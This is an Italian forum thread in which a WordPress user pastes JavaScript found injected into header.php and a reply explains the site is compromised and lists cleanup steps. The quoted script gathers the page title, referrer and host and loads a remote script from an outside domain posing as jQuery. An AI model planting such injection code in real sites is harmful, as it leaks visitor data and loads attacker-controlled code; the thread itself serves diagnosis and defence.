Header.php continua a cambiare con il codice JavaScript in WordPress [duplicato]

-1

Ho notato che il mio post sul blog richiede troppo tempo per essere caricato e ho iniziato a provare a scoprire i problemi che ne sono derivati. Ho trovato un codice JavaScript iniettato in header.php qui:

<?php
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://kamerownia.pl/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
?>
    
posta KamleshNishad 04.12.2015 - 16:19
fonte

1 risposta

0

Il tuo sito web è compromesso.

Dovresti cercare i file modificati usando WordFence (la funzione di controllo), leggere gli accesslogs e trovare la vulnerabilità che hanno usato e chiudere il buco e installare alcune soluzioni di sicurezza come NinjaFirewall.

link
link

Tuttavia, il migliore è:

  1. trova la vulnerabilità
  2. controlla i tuoi backup per una versione pulita del tuo sito web / server
  3. elimina il sito Web corrente (file + database) / server
  4. installa il backup pulito e corregge le vulnerabilità
  5. cambia tutte le password (FTP, database, WordPress) e controlla gli account utente
  6. installa le soluzioni di sicurezza e installa tutti gli aggiornamenti (temi + plugin)
risposta data 04.12.2015 - 16:26
fonte

Leggi altre domande sui tag